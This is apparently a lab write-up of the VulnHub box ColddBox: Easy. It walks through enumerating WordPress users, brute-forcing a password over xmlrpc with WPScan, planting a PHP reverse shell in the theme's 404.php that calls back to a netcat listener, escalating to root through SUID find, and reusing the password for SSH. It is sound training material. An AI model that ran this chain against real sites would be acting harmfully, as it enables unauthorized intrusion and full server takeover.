WordPress boxes have a reputation for being boring — same tools, same chain every time. ColddBox: Easy is exactly that, and I don't think that's a criticism. In real-world engagements, WordPress is the attack surface more often than anything else. Getting good at enumerating it quickly, abusing xmlrpc, and knowing where to drop a shell inside the admin panel is genuinely useful. The privesc here is SUID find, which I hadn't actually used before this box. Took me about two hours, mostly because I missed the non-standard SSH port the first time round.
01_Reconnaissance
Full port scan catches something easy to miss — SSH isn't on 22 here. It's on port 4512. I nearly skipped it because I was focused on port 80. The only reason I noticed was the -p- flag, which scans all 65535 ports. Always run full port scans on VulnHub boxes — machines routinely put services on non-standard ports.
$ sudo nmap -sC -sV -p- --min-rate 5000 192.168.1.15 PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: ColddBox: Easy | A WordPress Site 4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10
02_WordPress_Enumeration
Port 80 is running WordPress. Navigating to /wp-login.php confirms it. WPScan is the obvious choice here — I ran it with API token to get vulnerability data, and with --enumerate u to pull usernames. It found three: c0ldd, hugo, and philip.
$ wpscan --url http://192.168.1.15 --enumerate u [+] WordPress version 4.1.31 identified [+] Enumerating Users [i] User(s) Identified: [+] c0ldd [+] hugo [+] philip [!] XML-RPC seems to be enabled: http://192.168.1.15/xmlrpc.php
Key Finding — xmlrpc.php Enabled
xmlrpc.php is an API endpoint that WordPress exposes for remote publishing tools. The wp.getUsersBlogs method accepts credentials and allows unlimited brute-force attempts in a single HTTP request — no lockout, no rate limiting by default. It's one of the most abused vectors in WordPress pentesting.
03_xmlrpc_Brute_Force
WPScan handles xmlrpc brute force natively with the --password-attack xmlrpc flag. I targeted c0ldd first — it's the machine name derivative, always worth hitting first. rockyou.txt hits within a few minutes.
$ wpscan --url http://192.168.1.15 \ --usernames c0ldd \ --passwords /usr/share/wordlists/rockyou.txt \ --password-attack xmlrpc [+] Performing password attack on Xmlrpc against 1 user/s [SUCCESS] - c0ldd / [REDACTED] [!] Valid Combinations Found: | Username: c0ldd, Password: [REDACTED]
04_WordPress_RCE_via_Theme_Editor
Logged in as c0ldd — full administrator. This is where having WordPress admin access gets dangerous fast. The built-in Theme Editor (Appearance → Theme Editor) lets you edit any PHP file in any installed theme directly in the browser. I edited 404.php in the active theme, replaced the content with a PHP reverse shell from pentestmonkey, and triggered it by browsing to a non-existent page.
# Navigate to: http://192.168.1.15/wp-admin/theme-editor.php # Select: Twenty Fifteen → 404.php # Replace entire file content with PHP reverse shell: # https://github.com/pentestmonkey/php-reverse-shell <?php set_time_limit(0); $ip = '192.168.1.100'; // LHOST $port = 4444; // ... [full shell payload] ?> # Trigger 404 to execute the shell: http://192.168.1.15/?p=99999
$ nc -lvnp 4444 listening on [any] 4444 ... connect to [192.168.1.100] from (UNKNOWN) [192.168.1.15] 38844 Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP $ whoami www-data # Upgrade to proper shell $ python -c 'import pty; pty.spawn("/bin/bash")' www-data@ColddBox-Easy:/var/www/html$
05_PrivEsc_via_SUID_Find
Shell as www-data. Standard privesc checklist: check sudo, check crons, check SUID binaries. Sudo requires a password I don't have. Crons are clean. SUID search hits almost immediately — /usr/bin/find has the SUID bit set. That's the one.
www-data@ColddBox-Easy:~$ find / -perm /4000 -type f 2>/dev/null /bin/su /bin/ping /bin/ping6 /bin/fusermount /bin/mount /bin/umount /usr/bin/find /usr/bin/sudo /usr/bin/newuidmap ...
GTFObins documents the find SUID escalation — the -exec flag runs a command as the binary's owner (root in this case). The -p flag tells the spawned shell to preserve the privileged UID instead of dropping it.
# GTFObins — SUID find shell escape www-data@ColddBox-Easy:~$ find . -exec /bin/sh -p \; -quit # whoami root # id uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) # cat /root/root.txt [REDACTED]
Technique Note — SUID vs sudo find
There are two flavours of GTFObins find escalation. The sudo version (sudo find . -exec /bin/sh \; -quit) requires knowing the user's password for sudo. The SUID version (find . -exec /bin/sh -p \;) works with zero credentials — find is already running as root by virtue of the SUID bit, and -exec inherits that context. The -p flag is critical; without it, bash/sh will drop the EUID back to the real UID on startup. Reference: GTFObins/find.
06_Bonus_SSH_Access
One thing I checked after rooting — whether the WordPress admin password worked for SSH on port 4512. It did. Credential reuse is absurdly common and worth testing on every box. Sometimes the SSH path gives a cleaner shell than a reverse connection through a web server.
# Always check if web creds reuse for SSH $ ssh c0ldd@192.168.1.15 -p 4512 c0ldd@192.168.1.15's password: [REDACTED] c0ldd@ColddBox-Easy:~$ c0ldd@ColddBox-Easy:~$ cat user.txt [REDACTED]
07_Attack_Chain_Summary
- 01 Nmap -p- → port 80 (WordPress) + port 4512 (SSH — non-standard)
- 02 WPScan --enumerate u → users: c0ldd, hugo, philip; xmlrpc.php enabled
- 03 WPScan xmlrpc brute force → c0ldd:[REDACTED]
- 04 WP Admin → Appearance → Theme Editor → 404.php → PHP reverse shell payload
- 05 nc -lvnp 4444 → browse to 404 → shell as www-data
- 06 find / -perm /4000 → /usr/bin/find has SUID bit
- 07 find . -exec /bin/sh -p \; → euid=0(root)
- 08 Bonus: SSH c0ldd@:4512 with same password → user.txt